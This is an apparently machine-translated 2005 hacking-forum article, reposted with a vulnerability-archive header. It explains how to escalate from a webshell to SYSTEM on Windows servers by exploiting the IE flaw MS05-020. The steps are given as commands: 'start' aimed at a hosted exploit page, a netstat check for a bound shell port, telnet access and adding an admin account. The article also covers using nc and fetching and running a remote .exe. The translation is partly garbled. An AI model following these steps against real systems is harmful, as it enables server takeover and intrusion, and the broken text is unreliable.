The use of MS vulnerabilities and then talk about elevated permissions WEBSHELL-a vulnerability warning-the black bar safety net

2005-10-04T00:00:00
ID MYHACK58:6220053159
Type myhack58
Reporter 佚名
Modified 2005-10-04T00:00:00

Description

PS:long time no write articles, and today idle all right it's not alright, I'm more depressed, quickly test CET4, but the in the mind have no bottom, and casually throw a garbage article out, hoping to be helpful to everyone.

Today I want to bring to everyone is that when we get the WEBSHELL after how to get SYSTEM permissions of the new method, the elevated privileges this is already a cliché, on the network already has a variety of elevation methods, here I will not mention, today I give everybody introduction is is the active use of MS05020 vulnerability to reach our elevated destination. MS05020 is an IE vulnerability, 2005.4 parts when Microsoft will step up to this announcement: Security vulnerabilities CN-VA05-0 2 5 Release date: 2005-04-13 Vulnerability type: remote code execution Vulnerability assessment: high-risk Affected versions: Microsoft Windows 2 0 0 0 Service Pack 3 and Microsoft Windows 2 0 0 0 Service Pack 4 Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 Microsoft Windows XP 6 4-Bit Edition Service Pack 1 (Itanium) Microsoft Windows XP 6 4-Bit Edition Version 2 0 0 3 (Itanium)

Microsoft Windows Server 2 0 0 3 Microsoft Windows Server 2 0 0 3(for Itanium-Based Systems)Microsoft Windows 9 8, Microsoft Windows 9 8 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) tested Microsoft Windows Components: Vulnerability description: Internet Explorer due to its handling of certain DHTML objects and there is a remote code execution vulnerability. An attacker can construct a malicious Web page to exploit the vulnerability. If a user visited a malicious site, the malicious Web page that could potentially allow remote code execution. Successful exploitation of this vulnerability attacker can completely control the affected system. Internet Explorer due to its handling of certain URLS while there is a remote code execution vulnerability. An attacker can construct a malicious Web page to exploit the vulnerability. If a user visited a malicious site, the malicious Web page that could potentially allow remote code execution. Successful exploitation of this vulnerability attacker can completely control the affected system. Internet Explorer due to its processing classification review file method and there is a remote code execution vulnerability. An attacker can construct a specially crafted content Advisor file to exploit this vulnerability. If a user visits a malicious web site or viewed a malicious e-mail message and accept the installation of this malicious Content Advisor file, the file could allow remote code execution. Successful exploitation of this vulnerability attacker can completely control the affected system. However, to exploit this vulnerability, the need for extensive user interaction.

Everyone see the above vulnerability described? When people browse when it will attack, usually we use IE vulnerabilities are the first offensive of the page put online, and then wait for others to browse, so the viewer will be caught. Today we want to elevate permissions, that nature is to allow us to enhance the permissions of the host to browse the vulnerable page, and that when we get the WEBSHELL after how to allow the host to browse this page? Ms05020 EXP page code is already out, you can: http://www.eviloctal.com/forum/read.php?tid=10127 Go download, if we've put the EXP intohttp://www.xxxx.com/ms05020.htmlwhere Below we began to use this EXP, go to our ASP Trojan, open the CMDSHELL, if not, we want a solution you can yourself Upload a CMD. EXE up to. In the command line enter: start http://www.xxxx.com/ms05020.html and then point to perform.

这个 时候 主机 的 IE 就 会 去 访问 我们 的 这个 MS05020.HTML then if the host does not hit the flutter nail, it would bound a 2 8 8 7 6 off port on the host. Then we entered: netstat-an | find "2 8 8 7 6" to see if a successful bind, for the first time, it will slow down some, we have to wait a bit, I here soon. Then we telnet to go up immediately successful.

I added a temp administrator

Now we have got to SYSTEM permissions, we also want to do not?

PostScript: in fact, you can also first upload the NC, and then connected to the local, and then enter: start http://www.xxx.com/ms05020.htmlis also possible. There is if you can also can be input: start “C:\Program Files\Internet Explorer\icxplore.exe” http://www.xxx.com/ms05020.htm This depends on your situation, the General virtual host if you allow access, then use the first command! I've tested on 2K pro, 2K server(2 0 0 0 Enterprise Terminal Server), 2 0 0 3 successfully! But there are also unsuccessful, and unsuccessful probability is very large, especially to the virtual machine, once I do not succeed, then I open a 3 3 8 9 enter, find the IE does not pop up, but out of a IE Settings wizard, that is to say this server is not on the IE network settings IE is unable to access to the network, the AI, in fact I now also is not figuring out what happened to a little successful somewhat not, want to also can not figure out, because the start ist:http://www.xxx.com/xxx.exewill always succeed! The XXX. EXE download The to it computer top! I concluded that estimated the OR and MS05020. HTM this file is about. Al, it seems that this method of value in use is also very small, didn't want to issue to, since the write out, or post it out yourself! Just and invincible discussed a bit, and he is also said unsuccessful the reason the estimate is also this, there is the system to hit the IE patch.